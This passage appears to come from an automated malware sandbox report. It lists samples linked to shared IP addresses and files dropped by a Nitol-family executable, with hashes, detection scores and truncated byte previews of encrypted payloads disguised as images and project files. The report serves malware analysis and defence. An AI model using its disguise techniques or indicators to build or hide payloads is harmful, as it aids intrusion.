                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103
                                                        stage3.exeGet hashmaliciousCobaltStrikeBrowse
                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103
                                                        1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103
                                                        drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103
                                                        DyM4yXX.exeGet hashmaliciousVidarBrowse
                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103
                                                        http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103
                                                        DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103
                                                        xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103
                                                        DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103
                                                        fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                        • 118.178.60.9
                                                        • 39.103.20.42
                                                        • 118.178.60.103

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Program Files (x86)\5phaM8\5phaM8.exe2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                          2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                                                            e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                              23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                                287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                                  2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                                    2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                                      2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                                                        45631.exeGet hashmaliciousNitolBrowse
                                                                          0000000000000000.exeGet hashmaliciousNitolBrowse

                                                                            Created / dropped Files

                                                                            C:\Program Files (x86)\5phaM8\5phaM8.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):54152
                                                                            Entropy (8bit):6.64786972992462
                                                                            Encrypted:false
                                                                            SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                            MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                            SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                            SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                                                            • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                                                            • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                                                            • Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse
                                                                            • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                                                            • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                                                            • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                                                            • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                                                            • Filename: 45631.exe, Detection: malicious, Browse
                                                                            • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\5phaM8\log.src

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):5059989
                                                                            Entropy (8bit):7.9999552298471635
                                                                            Encrypted:true
                                                                            SSDEEP:98304:UOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:To6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                            MD5:90AE37525E0D053984328EDCA04384A3
                                                                            SHA1:75BD573EB2AFC64A2D5C20EA5B321A236A5C92DA
                                                                            SHA-256:16EF3868A4816A34C260AAC3C487AB0E95A6D0FED770921E73AE27F087791052
                                                                            SHA-512:4A5145FA315419B317C98BE5D710AF19AA66CBA4E70FE3BA08B6F793A551540E2D296E768DB779F21F861185AAA1504D1E6424CC4D2A0F4B8C0DE0E399230CA5
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Program Files (x86)\5phaM8\tbcore3U.dll

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4858192
                                                                            Entropy (8bit):7.992517210621536
                                                                            Encrypted:true
                                                                            SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/1:9S4+O6P5OeMRrjRy7aPZbm3k8V/1
                                                                            MD5:5CBFCD28F0510C7451379D45EAE793D2
                                                                            SHA1:0FC4305D25DB28DBA2C71931D7134E7501DA15DD
                                                                            SHA-256:E73C4083A625B88B2316CF2F30A4CD674DE1C2535714D9898D514C7D071ECA3F
                                                                            SHA-512:437C82E29CA16A396B921DB000A7F27D0E0BC380262932CE45BACAF089B7BF82B225743DF992AAE600BE30793F4D22672CC24B8124F01C0CF9DEF2EE168DD028
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\5phaM8\utils.vcxproj

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):365477
                                                                            Entropy (8bit):7.999399504771741
                                                                            Encrypted:true
                                                                            SSDEEP:6144:SiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:t8u69CghoQxoMTFQqtKFCG7mbZ
                                                                            MD5:31A637D66BA6AF60EB1CDB4414BB8F30
                                                                            SHA1:DBF05E5E9416A8944CE6246473BA1BE9E686AE7E
                                                                            SHA-256:DEC4D9707212E05510576C068BE090F9F3A1D9ABB51E81949BB88A694660D820
                                                                            SHA-512:73C9CF3BAE336B265BCC15BEA865D37C6895E7C5B4327D06D7C48D954E373414830781C09C2A587397ADC1AD33F9B600BC68128095B0505344DCB2412D0BD6DA
                                                                            Malicious:true
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Pa."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.59.222....."ijstuvwxyz....ufozdv.net......3#..............59.222....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                            C:\Program Files (x86)\Z93E12i3\5r1Aib1.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):54152
                                                                            Entropy (8bit):6.64786972992462
                                                                            Encrypted:false
                                                                            SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                            MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                            SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                            SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\Z93E12i3\log.src

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):5059989
                                                                            Entropy (8bit):7.999955226151416
                                                                            Encrypted:true
                                                                            SSDEEP:98304:qOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Fo6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                            MD5:19876030E59BF517F5A4FD0F28E50ADA
                                                                            SHA1:E3AC7A437DFA6954F9E9C2F768E1AAC92DFC22DD
                                                                            SHA-256:30262F9C94F0893FD583157C8E1848D11AA5CEB1C78B767FADDB1DB04C3211D6
                                                                            SHA-512:1EDF362ED50B877DA849138BD1481A36DC10F88A4D3BAF55CCD9AA5B23C785B68EE9AD2A5BA7205461C2E28289284B6166F650A6A292A49EF3695489CA276CC3
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q.....q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Program Files (x86)\Z93E12i3\tbcore3U.dll

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4858192
                                                                            Entropy (8bit):7.9925166899710405
                                                                            Encrypted:true
                                                                            SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/a:9S4+O6P5OeMRrjRy7aPZbm3k8V/a
                                                                            MD5:2ABB13982BC2DBD40C8DBF332986E9B5
                                                                            SHA1:E9C4A6B594379F5FFC7B427CF8120DA3F0468354
                                                                            SHA-256:F78F1AEE0E9C997A05E9B7DB288B7E1B04F4AD3B40FB97DFFA5F0168105CF22F
                                                                            SHA-512:6E6E0268F48B94CDC884B45CED19E8FBEF606712E9A8EE6470A7C9721123B04E7822D60A8585EA01F924250C49957F11644A3C5886F988E4DDB11A905059479A
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\Z93E12i3\utils.vcxproj

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):365477
                                                                            Entropy (8bit):7.9993994500685615
                                                                            Encrypted:true
                                                                            SSDEEP:6144:ziACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:G8u69CghoQxoMTFQqtKFCG7mbZ
                                                                            MD5:5C828B401D27F106327AA06C1915423B
                                                                            SHA1:807BD76D42A72A2864C476B84892949658790ECF
                                                                            SHA-256:86C45F9F5D8195DBAEA541FDBAE9219CAC9BCA34AADBA828199A7BF199C1635C
                                                                            SHA-512:3694C45717F4CDB9E161033121B89AB49ECA05159EFB0FC1018AA704972AB71E7800D5A2BDD12ADB7826ADC7443403EDDC774A2CC0C154206302FE4518437901
                                                                            Malicious:true
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.59.222....."ijstuvwxyz....ufozdv.net......3#..............59.222....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                            C:\Program Files (x86)\bmaosk\bmaosk.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):54152
                                                                            Entropy (8bit):6.64786972992462
                                                                            Encrypted:false
                                                                            SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                            MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                            SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                            SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\bmaosk\log.src

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):5059989
                                                                            Entropy (8bit):7.999955225631561
                                                                            Encrypted:true
                                                                            SSDEEP:98304:yOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:do6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                            MD5:0EE839904FC525A4BDEB8C01AF2264DB
                                                                            SHA1:42606DD80FDBFF5DAB2BADE4F85BCB16E7BAED7C
                                                                            SHA-256:4D7AB03994922BA932D1D131A52461EAA7BB49D186FC651B0734C791BD6EACED
                                                                            SHA-512:76E3C8B156079EB4118605F6DA9C385902721EC934165578D6B8EDD03A9B6BAF0CD676033521EA54E6B5E4107A125CACB63181880BEF3B989EC4F11F9EB3AE80
                                                                            Malicious:true
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Program Files (x86)\bmaosk\tbcore3U.dll

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4858192
                                                                            Entropy (8bit):7.992517130538185
                                                                            Encrypted:true
                                                                            SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/p:9S4+O6P5OeMRrjRy7aPZbm3k8V/p
                                                                            MD5:EEC356166C166BA97A6EC0CDE0B54206
                                                                            SHA1:FE40C07D115423A0384AE1096A317BD5AC7393AC
                                                                            SHA-256:230F8D64A8421BD76977765DE0B28C12E05C4C7C16565BB1C1D74496D19A7A4B
                                                                            SHA-512:1CAC1EBD415B139CE632F57E70211D9104D1FD745E9886B0595E57C4480EE27098D5749428128763CEC6E9A6E8A3AE8861477E99702205F52664651A257D0B60
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\bmaosk\utils.vcxproj

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\9afrYB.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):365477
                                                                            Entropy (8bit):7.999399400604808
                                                                            Encrypted:true
                                                                            SSDEEP:6144:7iACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:+8u69CghoQxoMTFQqtKFCG7mbZ
                                                                            MD5:F75A95BE215DC07E34FE1E2CABF215EC
                                                                            SHA1:D6164754EE90B0FFB2AAB083A184BE4EC0DC75F3
                                                                            SHA-256:14D67D097247E11ECEEAE37CDDF381D30F15BE3DF9307514DC6E3DECA565BE84
                                                                            SHA-512:D4DC2FB33B5BA831FC6435000ED39E6A7B5E91A5681038666A3248F2C360B7B00FD050A49461421A2785B568FEAA15E88B4862E3FCFB1ACE60DC48B6CACB3971
                                                                            Malicious:true
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.59.222....."ijstuvwxyz....ufozdv.net......3#..............59.222....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                            C:\ProgramData\EsnjLDMo\9eYJWFQF.dat

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):57472
                                                                            Entropy (8bit):7.994881946190658
                                                                            Encrypted:true
                                                                            SSDEEP:1536:LA5UOqaSzVJk7yHWGLvQL2NjQhzehEZSVsKJYe:LsUL1PSkbvG2pkze2GYe
                                                                            MD5:13F5540629A5BFA481DA932F7843BFAD
                                                                            SHA1:37CBBE9AAC612630CC0754AF9407F849077A27BE
                                                                            SHA-256:8ACE75F063CB7BED59552375539BACD79C075086F538C822BB94DF81717ED470
                                                                            SHA-512:687E3C3C7F490C8DF1274B515ED9465417D8C02B055BD60D8031E9F191C0849480C5FCF3B894B8CCED27C47DF7C04EF7FD34EEDC024858B0848F53ED16F67289
                                                                            Malicious:true
                                                                            Preview:PK........R.<XL~..............J.JPG.....4..`....).hV\.7...c?...A{......7..........h.ez..sO.E...u.o ..F..qf.[...F.|....*....`.9....#v..#`sb....s......^.!k....4....7..Ll.K...^T..=..H...5.:".}.I.....U....%p..sv^e..O..S.@V..w..s..$.o..+.0..5..{...%...TxG :a..G..U..W.i^.FX@...Ny2..C..h....1..W.........1>..r'(.....U..S..O7c.Y..c,..$8b%\....X\{.M..../\E.SJ}..x..sy..\8.....4pe%.8.....&..I]`..nW..%...C.....}.}?.*...1....\....:.....J....tG....U..DN...S....r..... .E..(..F..^..}Y...s$_%..X.`....3.5..w..x..R2..K...x.......)f\.B.J.n.1.h...l.F.....r.:k9.<u@..U/....=...)...).....e.u..]+yI$q.F.0..`.o..g...P...\..%..../...B..v.: .....5........q......HTw.!.b...h.4}..2....9Z...s03.?A3..@....CJ..J.%.{EZ....d...lrZq..Y.C.[.".~k.6.....x!.A.*. [ .9.c.!....qv.E..dh..&..*8...N(...2v_.X~...(L.~........kp...B.us...r.p.y._.h#..JX.W............H.)+...7.Q....9#wS.......&...%..........BE..[....\~\.?LK.\...X.....<V"...._..~.=O9.....O..g....;~...*.&...Z\)L...2.EN...*Q.W..

                                                                            C:\ProgramData\EsnjLDMo\9eYJWFQF.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                            Category:modified
                                                                            Size (bytes):486832
                                                                            Entropy (8bit):7.861812588302656
                                                                            Encrypted:false
                                                                            SSDEEP:12288:gNrhTLpMP+R+QDCfA832AtBYmz6af0F7Z1QVjSOsJ/V:gthTiP+ffCfB5Lf0F7Z1EDsVV
                                                                            MD5:66D1818C27C67B8BA01FE919E8ADCA5A
                                                                            SHA1:3C21CD0FD6885533A65E40ECAE8DA090BF280EED
                                                                            SHA-256:211E92EA1EA01CC184075D7B0460715275E5A32A6B3FEAAC21273A66C1546726
                                                                            SHA-512:556B2D986AA9E1AA8754241F6B5090EBCF98C18349D4B8B2DCC1246507091111B2BA1B3A4940DCB0B6109036DA6EFE53946D4E558D4026B7D7709B2028394FE2
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a...%.s.%.s.%.s.s.`...s...}...s.q=C.?.s..>y.(.s.%.r.x.s.G.`.<.s..8y...s..8x...s.%.s...s...u.$.s.Rich%.s.........................PE..L......T............................._.......p....@.................................C,......................................`........p..`u...........P..............................................................................................UPX0....................................UPX1................................@....rsrc........p...z..................@..............................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                                            C:\ProgramData\EsnjLDMo\9eYJWFQF.png

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\bmaosk\bmaosk.exe
                                                                            File Type:PNG image data, 4026 x 4026, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):357440
                                                                            Entropy (8bit):7.9993675513336235
                                                                            Encrypted:true
                                                                            SSDEEP:6144:ilMS00uPU0ovLFZL/hwQBXx/xO0JJu53+vn80QOzT:i6S00uPexZL/hZZx/xJoutQu
                                                                            MD5:36C2AF38DBFFC4FB4513219E5B2E47C7
                                                                            SHA1:25103AD56D659F383BF6227BB48E6CE65997E9DB
                                                                            SHA-256:FEE70AC5BCC99F02A55AC1D4CDE4A6873A817836B63762D317F5564BADCD8F1E
                                                                            SHA-512:994CC0DA379D3BEB82AB093BF129655DCAFAF5732CE1C62E9405F6F9DBF9282BF7FF5525693040D46FA81A4DE7CF8E9EC9135409F2FAB804FE80EB46EF068B89
                                                                            Malicious:true
